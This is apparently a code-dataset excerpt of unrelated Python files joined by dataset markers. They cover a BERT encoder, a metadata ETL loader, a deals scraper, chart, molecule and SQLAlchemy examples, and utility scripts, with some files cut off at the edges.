from language.mentionmemory.utils.custom_types import Array, Dtype, InitType # pylint: disable=g-multiple-import
@encoder_registry.register_encoder('bert')
class BertEncoder(base_encoder.BaseEncoder):
"""BERT encoder.
The BERT encoder (as in https://arxiv.org/abs/1810.04805) based on a vanilla
Transformer model.
Attributes:
vocab_size: size of token vocabulary.
hidden_size: dimensionality of token representations.
intermediate_dim: dimensionality of intermediate representations in MLP.
entity_dim: dimensionality of entity embeddings.
num_attention_heads: number of attention heads in Transformer layers.
num_layers: number of layers in first Transformer block.
dtype: data type of encoding (bfloat16 or float32). Parameters and certain
parts of computation (i.e. loss) are always in float32.
max_positions: number of positions (for positional embeddings).
max_length: maximal number of tokens for pre-training.
dropout_rate: dropout rate in Transformer layers.
num_segments: number of possible token types (for token type embeddings).
kernel_init: initialization function for model kernels.
bias_init: initialization function for model biases.
layer_norm_epsilon: layer norm constant for numerical stability.
"""
vocab_size: int
hidden_size: int
intermediate_dim: int
mention_encoding_dim: int
num_attention_heads: int
num_layers: int
dtype: Dtype
max_positions: int
# TODO(urikz): Move this argument out of model parameters
max_length: int
dropout_rate: float
num_segments: int = 2
kernel_init: InitType = default_values.kernel_init
bias_init: InitType = default_values.bias_init
layer_norm_epsilon: float = default_values.layer_norm_epsilon
def setup(self):
self.embedder = embedding.DictEmbed({
'token_ids':
embedding.Embed(
num_embeddings=self.vocab_size,
embedding_dim=self.hidden_size,
dtype=self.dtype,
embedding_init=self.kernel_init,
),
'position_ids':
embedding.Embed(
num_embeddings=self.max_positions,
embedding_dim=self.hidden_size,
dtype=self.dtype,
embedding_init=self.kernel_init,
),
'segment_ids':
embedding.Embed(
num_embeddings=self.num_segments,
embedding_dim=self.hidden_size,
dtype=self.dtype,
embedding_init=self.kernel_init,
)
})
self.embeddings_layer_norm = nn.LayerNorm(epsilon=self.layer_norm_epsilon)
self.embeddings_dropout = nn.Dropout(rate=self.dropout_rate)
self.encoder = transformer.TransformerBlock(
num_layers=self.num_layers,
model_dim=self.hidden_size,
intermediate_dim=self.intermediate_dim,
num_heads=self.num_attention_heads,
dropout_rate=self.dropout_rate,
dtype=self.dtype,
kernel_init=self.kernel_init,
bias_init=self.bias_init,
layer_norm_epsilon=self.layer_norm_epsilon,
)
self.mention_projector = nn.Dense(
features=self.mention_encoding_dim,
dtype=self.dtype,
)
def forward(
self,
batch: Dict[str, Array],
deterministic: bool,
) -> Tuple[Array, Dict[str, Array], Dict[str, Array]]:
loss_helpers = {}
logging_helpers = {}
embedded_input = self.embedder({
'token_ids': batch['text_ids'],
'position_ids': batch['position_ids'],
'segment_ids': batch['segment_ids']
})
embedded_input = self.embeddings_layer_norm(embedded_input)
embedded_input = self.embeddings_dropout(
embedded_input, deterministic=deterministic)
loss_helpers['word_embeddings'] = self.embedder.variables['params'][
'embedders_token_ids']['embedding']
attention_mask = batch['text_mask']
encoding = self.encoder(
encoding=embedded_input,
attention_mask=attention_mask,
deterministic=deterministic)
if 'mention_target_batch_positions' in batch:
mention_start_encodings = jut.matmul_2d_index_select(
encoding, (batch['mention_target_batch_positions'],
batch['mention_target_start_positions']))
mention_end_encodings = jut.matmul_2d_index_select(
encoding, (batch['mention_target_batch_positions'],
batch['mention_target_end_positions']))
loss_helpers['target_mention_encodings'] = self.mention_projector(
jnp.concatenate((mention_start_encodings, mention_end_encodings),
axis=-1))
return encoding, loss_helpers, logging_helpers
|
StarcoderdataPython
|
5103808
|
<filename>metadata-etl/src/main/resources/jython/OwnerTransform.py
#
# Copyright 2015 LinkedIn Corp. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
from org.slf4j import LoggerFactory
from wherehows.common import Constant
from com.ziclix.python.sql import zxJDBC
import sys
class OwnerTransform:
_tables = {"dataset_owner": {"columns": "dataset_urn, owner_id, sort_id, namespace, db_name, source_time",
"file": "dataset_owner.csv", "table": "stg_dataset_owner"}}
_clear_staging_tempalte = """
DELETE FROM {table}
"""
_read_file_template = """
LOAD DATA LOCAL INFILE '{folder}/{file}'
INTO TABLE {table}
FIELDS TERMINATED BY '\x1a' ESCAPED BY '\0'
LINES TERMINATED BY '\n'
({columns})
SET owner_source = 'AUDIT';
"""
_update_dataset_id_template = """
UPDATE {table} stg
JOIN dict_dataset dd
ON stg.dataset_urn = dd.urn
SET stg.dataset_id = dd.id
"""
_update_database_id_template = """
UPDATE {table} stg
JOIN cfg_database cd
ON stg.db_name = cd.db_code
SET stg.db_id = cd.db_id
"""
_update_app_id_template = """
UPDATE {table} stg
join dir_external_user_info ldap
on stg.owner_id = ldap.user_id
SET stg.app_id = ldap.app_id,
stg.is_group = 'N',
stg.owner_id_type = 'user',
stg.is_active = ldap.is_active
"""
_update_group_app_id_template = """
UPDATE {table} stg
join dir_external_group_user_map ldap
on stg.owner_id = ldap.group_id
SET stg.app_id = ldap.app_id,
stg.is_group = 'Y',
stg.owner_id_type = 'group',
stg.is_active = 'Y'
"""
_update_owner_type_template = """
UPDATE {table} stg
join dir_external_user_info ldap
on stg.owner_id = ldap.user_id
SET stg.owner_type = CASE WHEN ldap.department_id >= 4000 THEN 'Producer' ELSE 'Consumer' END,
stg.owner_sub_type = CASE WHEN ldap.department_id = 4020 THEN 'DWH' ELSE 'BA' END
"""
_update_parent_flag = """
update {table} s
join dict_dataset d on s.dataset_urn = substring(d.urn, 1, char_length(d.urn) - char_length(substring_index(d.urn, '/', -{lvl})) - 1)
set s.is_parent_urn = 'Y'
"""
def __init__(self, args):
self.logger = LoggerFactory.getLogger('jython script : ' + self.__class__.__name__)
self.wh_con = zxJDBC.connect(args[Constant.WH_DB_URL_KEY],
args[Constant.WH_DB_USERNAME_KEY],
args[Constant.WH_DB_PASSWORD_KEY],
args[Constant.WH_DB_DRIVER_KEY])
self.wh_cursor = self.wh_con.cursor()
self.db_id = int(args[Constant.DB_ID_KEY])
self.app_folder = args[Constant.WH_APP_FOLDER_KEY]
self.metadata_folder = self.app_folder + "/" + str(self.db_id)
def run(self):
try:
self.read_file_to_stg()
self.update_dataset_id()
self.update_database_id()
self.update_app_id()
self.update_owner_type()
finally:
self.wh_cursor.close()
self.wh_con.close()
def read_file_to_stg(self):
t = self._tables["dataset_owner"]
# Clear stagging table
query = self._clear_staging_tempalte.format(table=t.get("table"))
self.logger.debug(query)
self.wh_cursor.execute(query)
self.wh_con.commit()
# Load file into stagging table
query = self._read_file_template.format(folder=self.metadata_folder, file=t.get("file"), table=t.get("table"),
columns=t.get("columns"))
self.logger.debug(query)
self.wh_cursor.execute(query)
self.wh_con.commit()
def update_dataset_id(self):
t = self._tables["dataset_owner"]
query = self._update_dataset_id_template.format(table=t.get("table"))
self.logger.debug(query)
self.wh_cursor.execute(query)
self.wh_con.commit()
def update_database_id(self):
t = self._tables["dataset_owner"]
query = self._update_database_id_template.format(table=t.get("table"))
self.logger.debug(query)
self.wh_cursor.execute(query)
self.wh_con.commit()
def update_app_id(self):
t = self._tables["dataset_owner"]
query = self._update_app_id_template.format(table=t.get("table"))
self.logger.debug(query)
self.wh_cursor.execute(query)
self.wh_con.commit()
query = self._update_group_app_id_template.format(table=t.get("table"))
self.logger.debug(query)
self.wh_cursor.execute(query)
self.wh_con.commit()
def update_owner_type(self):
t = self._tables["dataset_owner"]
query = self._update_owner_type_template.format(table=t.get("table"))
self.logger.debug(query)
self.wh_cursor.execute(query)
self.wh_con.commit()
def update_parent_flag(self):
t = self._tables["dataset_owner"]
for l in range(1, 6):
query = self._update_parent_flag.format(table=t.get("table"), lvl=l)
self.logger.debug(query)
self.wh_cursor.execute(query)
self.wh_con.commit()
if __name__ == "__main__":
props = sys.argv[1]
ot = OwnerTransform(props)
ot.run()
|
StarcoderdataPython
|
3260797
|
<gh_stars>0
import seis_database
vp_db = seis_database.VpDb()
vp_db.delete_table_vp()
vp_db.delete_table_vp_files()
vp_db.delete_table_vaps()
vp_db.delete_table_vaps_files()
|
StarcoderdataPython
|
3491326
|
<reponame>pierky/mrtparse
#!/usr/bin/env python
'''
slice.py - This script slices MRT format data.
Copyright (C) 2016 greenHippo, LLC.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Authors:
<NAME> <<EMAIL>>
<NAME> <<EMAIL>>
<NAME> <<EMAIL>>
'''
from mrtparse import *
import argparse, time, gzip, bz2, re
from datetime import datetime
def parse_args():
parser = argparse.ArgumentParser(
description='This script slices MRT format data.')
parser.add_argument(
'path_to_file',
help='specify path to MRT format file')
parser.add_argument(
'-s', type=str, metavar='START_TIME', dest='start_time',
help='specify start time in format YYYY-MM-DD HH:MM:SS')
parser.add_argument(
'-e', type=str, metavar='END_TIME', dest='end_time',
help='specify end time in format YYYY-MM-DD HH:MM:SS')
parser.add_argument(
'-i', type=int, metavar='INTERVAL', dest='interval',
help='specify interval in seconds')
parser.add_argument(
'-c', type=str, choices=['gz', 'bz2'], dest='compress_type',
help='specify compress type (gz, bz2)')
return parser.parse_args()
def conv_unixtime(t):
try:
t = datetime.strptime(t, '%Y-%m-%d %H:%M:%S')
t = int(time.mktime(t.timetuple()))
except TypeError:
t = None
except ValueError:
print('error: invalid time \'%s\'' % t)
exit(1)
return t
def file_open(f, t, c):
f = re.sub(r'.gz$|.bz2$', '', f)
t = datetime.fromtimestamp(t).strftime('%Y%m%d-%H%M%S')
if c is None:
return open('%s-%s' % (f, t), 'wb')
elif c == 'gz':
return gzip.GzipFile('%s-%s.%s' % (f, t, c), 'wb')
elif c == 'bz2':
return bz2.BZ2File('%s-%s.%s' % (f, t, c), 'wb')
def slice_mrt(args):
t = start_time = conv_unixtime(args.start_time)
end_time = conv_unixtime(args.end_time)
interval = args.interval
if t is None:
d = Reader(args.path_to_file)
m = d.next()
t = m.mrt.ts
f = file_open(args.path_to_file, t, args.compress_type)
d = Reader(args.path_to_file)
for m in d:
m = m.mrt
if start_time and (m.ts < start_time):
continue
if end_time and (m.ts >= end_time):
break
if interval and (m.ts >= t + interval):
f.close()
t += interval
f = file_open(args.path_to_file, t, args.compress_type)
f.write(m.buf)
f.close()
def main():
args = parse_args()
slice_mrt(args)
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
5083917
|
# coding=utf-8
import json
from ... import options as opts
from ...charts.chart import Chart
from ...commons.types import List, Numeric, Optional, Sequence, Union
from ...commons.utils import produce_js_func
from ...datasets import COORDINATES
from ...globals import ChartType, TooltipFormatterType
class Geo(Chart):
"""
<<< 地理坐标系 >>>
地理坐标系组件用于地图的绘制,支持在地理坐标系上绘制散点图,线集。
"""
def __init__(self, init_opts: Union[opts.InitOpts, dict] = opts.InitOpts()):
super().__init__(init_opts=init_opts)
self.set_global_opts()
self._coordinates = COORDINATES
self._zlevel = 1
def add_coordinate(self, name: str, longitude: Numeric, latitude: Numeric):
self._coordinates.update({name: [longitude, latitude]})
def add_coordinate_json(self, json_file: str):
with open(json_file, "r", encoding="utf-8") as f:
json_reader = json.load(f)
for k, v in json_reader.items():
self.add_coordinate(k, v[0], v[1])
def get_coordinate(self, name: str) -> List:
if name in self._coordinates:
return self._coordinates[name]
def add_schema(
self,
maptype: str = "china",
is_roam: bool = True,
label_opts: Union[opts.LabelOpts, dict, None] = None,
itemstyle_opts: Union[opts.ItemStyleOpts, dict, None] = None,
emphasis_itemstyle_opts: Union[opts.ItemStyleOpts, dict, None] = None,
emphasis_label_opts: Union[opts.LabelOpts, dict, None] = None,
):
if isinstance(label_opts, opts.LabelOpts):
label_opts = label_opts.opts
if isinstance(itemstyle_opts, opts.ItemStyleOpts):
itemstyle_opts = itemstyle_opts.opts
if isinstance(emphasis_itemstyle_opts, opts.ItemStyleOpts):
emphasis_itemstyle_opts = emphasis_itemstyle_opts.opts
if isinstance(emphasis_label_opts, opts.LabelOpts):
emphasis_label_opts = emphasis_label_opts.opts
self.js_dependencies.add(maptype)
self.options.update(
geo={
"map": maptype,
"roam": is_roam,
"label": label_opts,
"itemStyle": itemstyle_opts,
"emphasis": {
"itemStyle": emphasis_itemstyle_opts,
"label": emphasis_label_opts,
},
}
)
return self
def add(
self,
series_name: str,
data_pair: Sequence,
type_: str = "scatter",
*,
is_selected: bool = True,
symbol: Optional[str] = None,
symbol_size: Numeric = 12,
color: Optional[str] = None,
label_opts: Union[opts.LabelOpts, dict] = opts.LabelOpts(),
effect_opts: Union[opts.EffectOpts, dict] = opts.EffectOpts(),
linestyle_opts: Union[opts.LineStyleOpts, dict] = opts.LineStyleOpts(),
tooltip_opts: Union[opts.TooltipOpts, dict, None] = None,
itemstyle_opts: Union[opts.ItemStyleOpts, dict, None] = None,
):
if isinstance(label_opts, opts.LabelOpts):
label_opts = label_opts.opts
if isinstance(effect_opts, opts.EffectOpts):
effect_opts = effect_opts.opts
if isinstance(linestyle_opts, opts.LineStyleOpts):
linestyle_opts = linestyle_opts.opts
if isinstance(tooltip_opts, opts.TooltipOpts):
tooltip_opts = tooltip_opts.opts
if isinstance(itemstyle_opts, opts.ItemStyleOpts):
itemstyle_opts = itemstyle_opts.opts
self._zlevel += 1
data = []
for n, v in data_pair:
if type_ == ChartType.LINES:
f, t = self.get_coordinate(n), self.get_coordinate(v)
data.append({"name": "{}->{}".format(n, v), "coords": [f, t]})
else:
lng, lat = self.get_coordinate(n)
data.append({"name": n, "value": [lng, lat, v]})
self._append_color(color)
self._append_legend(series_name, is_selected)
if type_ == ChartType.SCATTER:
self.options.get("series").append(
{
"type": type_,
"name": series_name,
"coordinateSystem": "geo",
"symbol": symbol,
"symbolSize": symbol_size,
"data": data,
"label": label_opts,
"tooltip": tooltip_opts,
"itemStyle": itemstyle_opts,
}
)
elif type_ == ChartType.EFFECT_SCATTER:
self.options.get("series").append(
{
"type": type_,
"name": series_name,
"coordinateSystem": "geo",
"showEffectOn": "render",
"rippleEffect": effect_opts,
"symbol": symbol,
"symbolSize": symbol_size,
"data": data,
"label": label_opts,
"tooltip": tooltip_opts,
"itemStyle": itemstyle_opts,
}
)
elif type_ == ChartType.HEATMAP:
self.options.get("series").append(
{
"type": type_,
"name": series_name,
"coordinateSystem": "geo",
"data": data,
"tooltip": tooltip_opts,
"itemStyle": itemstyle_opts,
}
)
elif type_ == ChartType.LINES:
self.options.get("series").append(
{
"type": type_,
"name": series_name,
"zlevel": self._zlevel,
"effect": effect_opts,
"symbol": symbol or ["none", "arrow"],
"symbolSize": symbol_size,
"data": data,
"lineStyle": linestyle_opts,
"tooltip": tooltip_opts,
"itemStyle": itemstyle_opts,
}
)
return self
def set_global_opts(
self,
title_opts: Union[opts.TitleOpts, dict] = opts.TitleOpts(),
tooltip_opts: Union[opts.TooltipOpts, dict] = opts.TooltipOpts(
formatter=produce_js_func(TooltipFormatterType.GEO)
),
legend_opts: Union[opts.LegendOpts, dict] = opts.LegendOpts(),
toolbox_opts: Union[opts.ToolboxOpts, dict] = None,
xaxis_opts: Union[opts.AxisOpts, dict, None] = None,
yaxis_opts: Union[opts.AxisOpts, dict, None] = None,
visualmap_opts: Union[opts.VisualMapOpts, dict, None] = None,
datazoom_opts: List[Union[opts.DataZoomOpts, dict, None]] = None,
):
return super().set_global_opts(
title_opts=title_opts,
tooltip_opts=tooltip_opts,
legend_opts=legend_opts,
toolbox_opts=toolbox_opts,
xaxis_opts=xaxis_opts,
yaxis_opts=yaxis_opts,
visualmap_opts=visualmap_opts,
datazoom_opts=datazoom_opts,
)
|
StarcoderdataPython
|
11384940
|
from bs4 import BeautifulSoup
import requests
import webbrowser
def getDeals(cat,page):
dealsList=[]
url="https://www.hotukdeals.com/{}?page={}".format(cat,page)
soup = BeautifulSoup(requests.get(url).content,"html5lib")
deals = soup.find_all("article")
for deal in deals:
if "thread--expired" in deal["class"]:
continue
linkElement = deal.find("a",{"class":"thread-title--list"})
title = linkElement["title"]
try:
href = deal.find("a",{"class":"cept-dealBtn"})["href"]
price = deal.find("span",{"class":"thread-price"}).text
except (AttributeError, TypeError):
continue
if price == "FREE":
price = 0
else:
try:
price = float(price[1:].replace(",",""))
except ValueError:
# print("ERROR: couldn't parse price",price)
continue
dealsList.append([title,price,href])
return dealsList
def maxPrice(li,maxp):
index = 0
for item in li:
index += 1
if item[1] > maxp:
break
return li[:index-1]
def numSort(li):
return sorted(li, key = lambda x: x[1]) # https://www.geeksforgeeks.org/python-sort-list-according-second-element-sublist/
def keyFilter(keywords,items):
filteredList = []
for item in items:
if any(key.lower() in item[0].lower() for key in keywords):
filteredList.append(item)
return numSort(filteredList)
def getInputs(prompt):
print("Ctrl+C to finish submitting keywords")
inputs=[]
while True:
try:
inputs.append(input(prompt))
except KeyboardInterrupt:
break
return inputs
def printList(li):
count = 0
for item in li:
count+=1
print(str(count)+")","£"+str(item[1]),"-",item[0])
n = int(input("Scrape results from how many pages: "))
cat=input("Category [hot/new] (leave blank for default): ").lower()
print("Loading...")
deals = []
for i in range(1,n):
deals.extend(getDeals(cat, i+1))
sortedDeals = numSort(deals)
print("Done")
while True:
print()
menuDict = {
"K":"Keyword filter",
"P":"Price filter",
"D":"Display results",
"G":"Go to number"
}
for key in menuDict:
print(key,":",menuDict[key])
print()
option = input("Select option: ").lower()
if option == "k":
keywords = getInputs("Add a keyword: ")
sortedDeals = keyFilter(keywords, deals)
elif option == "p":
sortedDeals = maxPrice(numSort(deals), float(input("Max price: ")))
elif option == "d":
printList(sortedDeals)
elif option == "g":
index = int(input("Number: "))
webbrowser.open_new_tab(requests.get(sortedDeals[index-1][2]).url)
|
StarcoderdataPython
|
1697243
|
<reponame>cstein/neb
import copy
import numpy
import atom
import bond
import angle
class Molecule(object):
""" A molecule.
A molecule is at the minimum a collection of atoms.
The molecule class can also be asked to identify all bonds. This can be
quite costly since we use a brute force approach.
"""
_bond_threshold = 0.45 # Added threshold for bonds. Replicates openbabel
def __init__(self):
self._charge = 0
self._multiplicity = 1
self._atoms = []
self._bonds = []
self._name = ""
# class methods
@classmethod
def fromMolecule(cls, m):
M = cls()
M.setCharge(m.getCharge())
M.setMultiplicity(m.getMultiplicity())
M.setName(m.getName())
if m.getNumAtoms() > 0:
M.addAtoms(*m.getAtoms())
# currently we do not transfer bond information
return M
# getters and setters for various properties
def addAtom(self, _atom):
#assert isinstance(_atom, atom.Atom), "You attempted to add something that was not an atom."
self._atoms.append(copy.deepcopy(_atom))
def addAtoms(self, *args):
for _atom in args:
self.addAtom(_atom)
def getNumAtoms(self):
""" Returns the number of atoms in the molecule """
return len(self._atoms)
def getAtoms(self):
for _atom in self._atoms:
yield _atom
def getBonds(self):
""" Returns all bonds (as an iterator) in the molecule
If the bond list has not been calculated before, the bonds are
percieved through the percieveBonds method
"""
if len(self._bonds) == 0:
self._bonds = list(self.percieveBonds())
for _bond in self._bonds:
yield _bond
def getName(self):
return self._name
def setName(self, value):
assert isinstance(value, str)
self._name = value
def getCharge(self):
return self._charge
def setCharge(self, value):
assert isinstance(value, int)
self._charge = value
def getMultiplicity(self):
return self._multiplicity
def setMultiplicity(self, value):
assert isinstance(value, int)
self._multiplicity = value
# properties that are lazily evaluated such as bonds and angles
def percieveBonds(self):
""" This method attempts to percieve bonds
It works by comparing atom distances to covalent radii of the atoms.
It is not optimized in any way.
"""
for iat, atom1 in enumerate(self.getAtoms()):
for jat, atom2 in enumerate(self.getAtoms()):
if iat <= jat: continue
dr = atom2.getCoordinate() - atom1.getCoordinate()
R2 = dr.dot(dr)
dr_cov = atom1.getCovalentRadius() + atom2.getCovalentRadius() + self._bond_threshold
R2_cov = dr_cov**2
if R2 < R2_cov:
yield bond.Bond(id1=iat, id2=jat)
def percieveAngles(self):
""" This method attemps to percieve angles
It works by iterating through all bonds in the molecule
"""
for ibd, bond1 in enumerate(self.getBonds()):
for jbd, bond2 in enumerate(self.getBonds()):
if ibd <= jbd: continue
jatm = bond1.sharesAtom(bond2)
if jatm >= 0:
iatm = bond1.getNbrAtomIdx(jatm)
katm = bond2.getNbrAtomIdx(jatm)
yield angle.Angle(iatm, jatm, katm)
# specialized options to extract information stored in
# other classes related to molecule
def getCoordinates(self):
""" Returns a numpy array with all the coordinates
of all the atoms in the molecule
"""
c = numpy.zeros((self.getNumAtoms(), 3))
for iat, _atom in enumerate(self.getAtoms()):
c[iat] = _atom.getCoordinate()
return c
def setCoordinates(self, c):
""" Sets the coordinates of all atoms in the molecule from
the numpy array
"""
assert isinstance(c, numpy.ndarray)
(n,k) = numpy.shape(c)
assert n == self.getNumAtoms()
for iat, _atom in enumerate(self.getAtoms()):
_atom.setCoordinate(c[iat])
|
StarcoderdataPython
|
190060
|
<reponame>LegitStack/knot
from .config import get, put, env, project_path
|
StarcoderdataPython
|
3282677
|
"""Illustrate a "three way join" - where a primary table joins to a remote
table via an association table, but then the primary table also needs
to refer to some columns in the remote table directly.
E.g.::
first.first_id -> second.first_id
second.other_id --> partitioned.other_id
first.partition_key ---------------------> partitioned.partition_key
For a relationship like this, "second" is a lot like a "secondary" table,
but the mechanics aren't present within the "secondary" feature to allow
for the join directly between first and partitioned. Instead, we
will derive a selectable from partitioned and second combined together, then
link first to that derived selectable.
If we define the derived selectable as::
second JOIN partitioned ON second.other_id = partitioned.other_id
A JOIN from first to this derived selectable is then::
first JOIN (second JOIN partitioned
ON second.other_id = partitioned.other_id)
ON first.first_id = second.first_id AND
first.partition_key = partitioned.partition_key
We will use the "non primary mapper" feature in order to produce this.
A non primary mapper is essentially an "extra" :func:`.mapper` that we can
use to associate a particular class with some selectable that is
not its usual mapped table. It is used only when called upon within
a Query (or a :func:`.relationship`).
"""
from sqlalchemy import *
from sqlalchemy.orm import *
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class First(Base):
__tablename__ = 'first'
first_id = Column(Integer, primary_key=True)
partition_key = Column(String)
def __repr__(self):
return ("First(%s, %s)" % (self.first_id, self.partition_key))
class Second(Base):
__tablename__ = 'second'
first_id = Column(Integer, primary_key=True)
other_id = Column(Integer, primary_key=True)
class Partitioned(Base):
__tablename__ = 'partitioned'
other_id = Column(Integer, primary_key=True)
partition_key = Column(String, primary_key=True)
def __repr__(self):
return ("Partitioned(%s, %s)" % (self.other_id, self.partition_key))
j = join(Partitioned, Second, Partitioned.other_id == Second.other_id)
partitioned_second = mapper(Partitioned, j, non_primary=True, properties={
# note we need to disambiguate columns here - the join()
# will provide them as j.c.<tablename>_<colname> for access,
# but they retain their real names in the mapping
"other_id": [j.c.partitioned_other_id, j.c.second_other_id],
})
First.partitioned = relationship(
partitioned_second,
primaryjoin=and_(
First.partition_key == partitioned_second.c.partition_key,
First.first_id == foreign(partitioned_second.c.first_id)
), innerjoin=True)
# when using any database other than SQLite, we will get a nested
# join, e.g. "first JOIN (partitioned JOIN second ON ..) ON ..".
# On SQLite, SQLAlchemy needs to render a full subquery.
e = create_engine("sqlite://", echo=True)
Base.metadata.create_all(e)
s = Session(e)
s.add_all([
First(first_id=1, partition_key='p1'),
First(first_id=2, partition_key='p1'),
First(first_id=3, partition_key='p2'),
Second(first_id=1, other_id=1),
Second(first_id=2, other_id=1),
Second(first_id=3, other_id=2),
Partitioned(partition_key='p1', other_id=1),
Partitioned(partition_key='p1', other_id=2),
Partitioned(partition_key='p2', other_id=2),
])
s.commit()
for row in s.query(First, Partitioned).join(First.partitioned):
print(row)
for f in s.query(First):
for p in f.partitioned:
print(f.partition_key, p.partition_key)
|
StarcoderdataPython
|
8024352
|
<gh_stars>0
#!/usr/bin/env python3
#
# Author: <NAME>
# License: BSD 2-clause
# Last Change: Mon Aug 16, 2021 at 06:04 PM +0200
import ROOT
ROOT.PyConfig.IgnoreCommandLineOptions = True # Don't hijack argparse!
ROOT.PyConfig.DisableRootLogon = True # Don't read .rootlogon.py
from argparse import ArgumentParser
from os.path import basename, splitext, join
from ROOT import gInterpreter, RDataFrame
################################
# Command line argument parser #
################################
def parse_input():
parser = ArgumentParser(description='''
split a single ntuple to train, validation, and test ntuples based on a given
percentage.
''')
parser.add_argument('ntp', help='input ntuple.')
parser.add_argument('tree', help='input tree.')
parser.add_argument('-d', '--debug',
action='store_true',
help='enable debug output.')
parser.add_argument('-o', '--output-dir',
default='.',
help='output directory.')
parser.add_argument('-T', '--train-ratio',
type=int,
default=35,
help='specify train ntuple ratio.')
parser.add_argument('-V', '--validation-ratio',
type=int,
default=35,
help='specify validation ntuple ratio.')
parser.add_argument('--seed',
default='42',
help='specify random seed.')
return parser.parse_args()
###########
# Helpers #
###########
def get_filename(path):
return basename(splitext(path)[0])
def get_cuts(train, validation, br='rand_split'):
return {
'train': '{lb} <= {br} && {br} < {ub}'.format(
br=br, lb=0, ub=train),
'valid': '{lb} <= {br} && {br} < {ub}'.format(
br=br, lb=train, ub=train+validation),
'test': '{lb} <= {br} && {br} <= {ub}'.format(
br=br, lb=train+validation, ub=100)
}
########
# Main #
########
if __name__ == '__main__':
args = parse_input()
gInterpreter.Declare('auto rand_gen = TRandom3({});'.format(args.seed))
init_frame = RDataFrame(args.tree, args.ntp)
rand_frame = init_frame.Define('rand_split', 'rand_gen.Uniform(0, 100)')
if args.debug:
print('loaded {} with {} entries'.format(
args.ntp, rand_frame.Count().GetValue()))
cuts = get_cuts(args.train_ratio, args.validation_ratio)
for sample, cut in cuts.items():
subsample_frame = rand_frame.Filter(cut)
output_ntp = join(args.output_dir, '{}_{}.root'.format(
get_filename(args.ntp), sample))
subsample_frame.Snapshot(args.tree, output_ntp)
if args.debug:
print('sample: {}, cuts: {}'.format(sample, cut))
print('wrote {} with {} entries'.format(
output_ntp, subsample_frame.Count().GetValue()))
|
StarcoderdataPython
|
9685779
|
"""
Fixer for method.__X__ -> method.im_X
"""
from lib2to3 import fixer_base
from lib2to3.fixer_util import Name
MAP = {
"__func__" : "im_func",
"__self__" : "im_self"
# Fortunately, im_self.__class__ == im_class in 2.5.
}
class FixMethodattrs(fixer_base.BaseFix):
PATTERN = """
power< any+ trailer< '.' attr=('__func__' | '__self__') > any* >
"""
def transform(self, node, results):
attr = results["attr"][0]
new = str(MAP[attr.value])
attr.replace(Name(new, prefix=attr.prefix))
|
StarcoderdataPython
|
1672931
|
"""
This module contains submodules for generating the sampling grid
coordinates on which to propagate the acoustic field.
"""
__all__ = [
'abstract_sampler',
'clist_sampler',
'hexagonal_sampler',
'lambert_sampler',
'rectilinear_sampler'
]
|
StarcoderdataPython
|
1735263
|
# -*- coding: utf-8 -*-
from django.contrib import admin
from . import models
# Register your models here.
class ProjectsInLine(admin.TabularInline):
# inherits from Tabular inline so Projects can appear as a table on the user page
model = models.Project
extra = 0
@admin.register(models.Profile)
class ProfileAdmin(admin.ModelAdmin):
# display three columns, third will be from _projects function
list_display = ("username", "interaction", "_projects")
search_fields = ["user__username"]
inlines = [
ProjectsInLine
]
def _projects(self, obj):
# counts no. of projects for a particular profile, used in display
return obj.projects.all().count()
|
StarcoderdataPython
|
3254792
|
<reponame>jeffersonraimon/Programming-UFBA
E, P =input().split()
E = int(E)
P = int(P)
cont = E - P
contador = 1
contadorP = P - 1
if contadorP > 0:
while cont > 0:
cont = cont - contadorP
contador = contador + 1
if contadorP <= 0:
print("F")
break
contadorP = contadorP - 1
else:
print(contador)
else:
print("F")
|
StarcoderdataPython
|
5091380
|
<filename>r/pandas.py
import copy
from rpy2.robjects import pandas2ri, numpy2ri
import rpy2.robjects.conversion as conversion
from rpy2.robjects import r
OTHER_DEFAULT_CONVERSIONS = {
# R (str) : Python type
"NULL": type(None),
}
def automatic_pandas_conversion(**other_conversions):
"""Automatically convert between pandas and R objects according to rpy2-pandas2ri.
This is based on the pandas2ri.activate function that will be deprected soon.
Arguements
----------
**other_conversions : str : object
Additional conversion of python objects from/to R given as
R code (str): Python object.
"""
other_conversions = copy.deepcopy(OTHER_DEFAULT_CONVERSIONS)
other_conversions.update(other_conversions)
new_converter = conversion.Converter('snapshot before pandas conversion',
template=conversion.converter)
npc, pdc = numpy2ri.py2rpy.registry.items(), pandas2ri.py2rpy.registry.items()
for k, v in list(npc) + list(pdc):
if k is object:
continue
new_converter.py2rpy.register(k, v)
# other conversions
for rcode, p in other_conversions.items():
new_converter.py2rpy.register(p, lambda x: r(rcode))
npc, pdc = numpy2ri.rpy2py.registry.items(), pandas2ri.rpy2py.registry.items()
for k, v in list(npc) + list(pdc):
if k is object:
continue
new_converter.rpy2py.register(k, v)
# other conversions
for rcode, p in other_conversions.items():
new_converter.rpy2py.register(r(rcode), lambda x: p)
conversion.set_conversion(new_converter)
return
|
StarcoderdataPython
|
1941780
|
<filename>pincer/commands.py
# Copyright Pincer 2021-Present
# Full MIT License can be found in `LICENSE` at the project root.
from __future__ import annotations
import logging
import re
from asyncio import iscoroutinefunction, gather
from copy import deepcopy
from inspect import Signature, isasyncgenfunction
from typing import (
Optional, Dict, List, Any, Tuple, get_origin, get_args, Union,
ForwardRef, _eval_type
)
from . import __package__
from .exceptions import (
CommandIsNotCoroutine, CommandAlreadyRegistered, TooManyArguments,
InvalidAnnotation, CommandDescriptionTooLong, InvalidCommandGuild,
InvalidCommandName
)
from .objects import ThrottleScope, AppCommand, Role, User, Channel, Guild
from .objects.app import (
AppCommandOptionType, AppCommandOption, AppCommandOptionChoice,
ClientCommandStructure, AppCommandType
)
from .utils import (
get_signature_and_params, get_index, should_pass_ctx, Coro, Snowflake,
MISSING, choice_value_types, Choices
)
